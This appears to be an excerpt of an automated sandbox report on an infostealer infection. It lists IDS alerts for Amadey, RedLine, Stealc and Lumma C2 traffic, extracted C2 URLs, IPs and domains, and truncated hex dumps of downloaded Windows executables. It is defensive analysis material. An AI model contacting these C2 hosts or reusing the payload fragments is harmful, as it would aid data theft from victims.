Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004E6F20
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then xor eax, eax 16_2_004CEFFC
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp+00000120h] 16_2_004CEFFC
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 16_2_004DCFF0

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49602 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.6:49602
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49604 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49607 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49610 -> 65.21.18.51:45580
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49610 -> 65.21.18.51:45580
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.6:49610
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49611 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49614 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.6:49613
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.6:49613
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.6:49610
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49616 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49617 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49622 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 185.215.113.117:80 -> 192.168.2.6:49623
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49624 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49624 -> 89.105.223.196:29862
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.6:49624
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49626 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.6:49630 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.6:49630 -> 185.215.113.67:15206
Source: Network traffic Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.6:49630
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49629 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.6:49624
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49632 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49633 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.6:49630
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 91.202.233.158:80 -> 192.168.2.6:49631
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 91.202.233.158:80 -> 192.168.2.6:49631
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.6:62485 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49636 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.6:49635 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.6:49638 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49640 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49645 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49643
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49643 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49648 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49681 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49723 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49726 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49635 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49635 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49638 -> 172.67.162.108:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49638 -> 172.67.162.108:443
Source: Malware configuration extractor URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor URLs: lootebarrkeyn.shop
Source: Malware configuration extractor URLs: gutterydhowi.shop
Source: Malware configuration extractor URLs: reinforcenh.shop
Source: Malware configuration extractor URLs: stogeneratmns.shop
Source: Malware configuration extractor URLs: vozmeatillu.shop
Source: Malware configuration extractor URLs: ghostreedmnu.shop
Source: Malware configuration extractor URLs: offensivedzvju.shop
Source: Malware configuration extractor URLs: fragnantbui.shop
Source: Malware configuration extractor URLs: drawzhotdog.shop
Source: Malware configuration extractor URLs: 188.190.10.161
Source: Malware configuration extractor URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor IPs: 185.215.113.16
Source: Malware configuration extractor URLs: 89.105.223.196:29862
Source: global traffic TCP traffic: 185.215.113.67 ports 0,1,2,5,6,15206
Source: Yara match File source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.6:49606 -> 95.179.250.45:26212
Source: global traffic TCP traffic: 192.168.2.6:49610 -> 65.21.18.51:45580
Source: global traffic TCP traffic: 192.168.2.6:49624 -> 89.105.223.196:29862
Source: global traffic TCP traffic: 192.168.2.6:49630 -> 185.215.113.67:15206
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:06 GMTContent-Type: application/octet-streamContent-Length: 320000Last-Modified: Wed, 11 Sep 2024 19:08:04 GMTConnection: keep-aliveETag: "66e1ea94-4e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d7 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 05 00 00 06 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f7 04 00 00 00 00 00 48 00 00 00 02 00 05 00 68 e8 04 00 70 0d 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 49 98 c5 eb e4 07 3d 4e 57 c4 94 0e b8 53 b5 28 8c a4 60 7d 43 e0 bd be a1 50 3f 32 96 e1 7f 68 ee 09 6c 85 3c 41 15 49 09 ba d4 fa f6 43 4e bc b8 ee c3 2f 99 75 8f 13 54 98 eb 94 d5 14 eb ae 0f 0f 40 0b 24 ba 30 ac ba 72 e4 aa c5 d3 22 5f 38 29 4c a5 93 97 73 a9 59 51 ec 11 25 fb 2f 3f dd c0 ca 4c 9f a3 37 65 26 5b d4 7a e2 92 dd eb bd c1 ae 2a 12 e3 6a 2e 9a 38 4a cb f5 ec b2 73 6e a8 3d e2 e0 4f dc a1 c9 e4 7c b2 90 d7 6e b7 f6 87 10 17 67 55 44 47 b4 ac 48 4b 1b 0e e4 87 e2 52 05 54 dc fa e9 31 4c 7a ca d5 dd 7f 0d 46 b5 7f 5e 6c ca b6 79 a8 7b 4a 80 90 42 7c 80 f8 ad 60 9f 6f 48 f3 8c 33 c5 fb 13 ac f3 56 4e d2 d8 66 94 7d 4a 06 87 f6 2f bf 3f 7f b6 89 bf dd e0 a0 b3 da b3 34 6e 45 85 53 86 a8 f1 e1 33 41 b1 d3 72 04 4d 9e 7f 71 66 e7 05 7b 8b 08 d6 a9 8b fd 21 49 55 07 c8 2f b1 4d 85 3f 3e f0 02 88 e8 08 a2 30 e7 65 94 96 58 16 66 e9 0b b0 69 09 55 69 17 02 ad cf a0 60 fc 77 be 88 66 61 b4 fe 4c 77 69 b7 56 4d a0 69 e1 34 ac d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:09 GMTContent-Type: application/octet-streamContent-Length: 903168Last-Modified: Wed, 25 Sep 2024 19:30:48 GMTConnection: keep-aliveETag: "66f464e8-dc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 64 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 be 0d 00 00 08 00 00 00 00 00 00 ee dc 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 dc 0d 00 57 00 00 00 00 e0 0d 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 5c db 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 0d 00 00 20 00 00 00 be 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 e0 0d 00 00 06 00 00 00 c0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 c6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 ca 0d 00 9c 10 00 00 03 00 02 00 13 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 6b ae d1 cd 28 d7 51 9d 2e cd 47 51 4c b3 ec 71 b5 82 95 83 cc 4e 71 72 d8 5c 9c 5e 76 e3 84 45 f8 df e1 e3 3c 8a 1c 40 3d ea aa d5 1c 29 21 62 e6 3d 71 51 2e ec b2 2e 42 0e 63 fc 1c 8c c6 ce 3c bf 71 b5 69 92 20 41 eb a1 b5 51 45 2c 54 ae 14 7e 66 cb 58 33 ec 89 ec 1e 81 df 7e f2 8f dd 9d 24 15 29 0a 28 38 74 07 ac a7 9b c4 e1 01 ec ed 72 e2 63 40 10 de 9e 13 69 a8 32 85 3f c4 2d 14 38 d1 fe 2d 09 84 e1 e8 c6 a0 3a 05 b1 ac 27 49 b2 60 44 f2 e6 aa d3 3f 2f 33 3f c5 1d d2 57 50 1f 27 db 02 c0 58 4c 7a 96 12 ce ef 62 12 7c 20 32 97 e1 d4 88 c4 2a 12 d6 86 ed 5c 0b 15 a6 11 1a d4 ad 8b 9d 42 19 0f a1 ed 48 67 24 33 70 df ad 7c 2b 73 fc b8 4b 8f b1 11 ee 5a cb 6d ba 60 fb f1 ce eb 77 7f 09 77 bd 69 f1 ba 56 74 06 0f 6e ef 4c 4c 0a db f7 64 0e 60 61 8e 4f 8b c8 54 c4 fc 9e ca 05 c8 c0 23 6b b5 30 44 40 64 9a fc 38 70 a4 7b 2e 3f 5a 0c d0 8e 2d c7 c8 5c 57 bf ea bf cf 2c a7 28 b6 c7 50 cc 17 26 60 4c 06 09 3f 5a ef c4 4a 2c 79 fd 3a a0 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:12 GMTContent-Type: application/x-msdos-programContent-Length: 425984Connection: keep-aliveLast-Modified: Sat, 24 Aug 2024 17:17:20 GMTETag: "68000-620711078a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 3c 4c 00 00 e0 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 91 05 00 18 00 00 00 18 91 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 c8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a e5 04 00 00 10 00 00 00 e6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 10 01 00 00 00 05 00 00 12 01 
00 00 ea 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 20 06 00 00 34 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 4c 00 00 00 a0 06 00 00 4e 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:15 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 14:18:18 GMTContent-Type: application/octet-streamContent-Length: 4278784Last-Modified: Thu, 12 Sep 2024 13:56:06 GMTConnection: keep-aliveETag: "66e2f2f6-414a00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 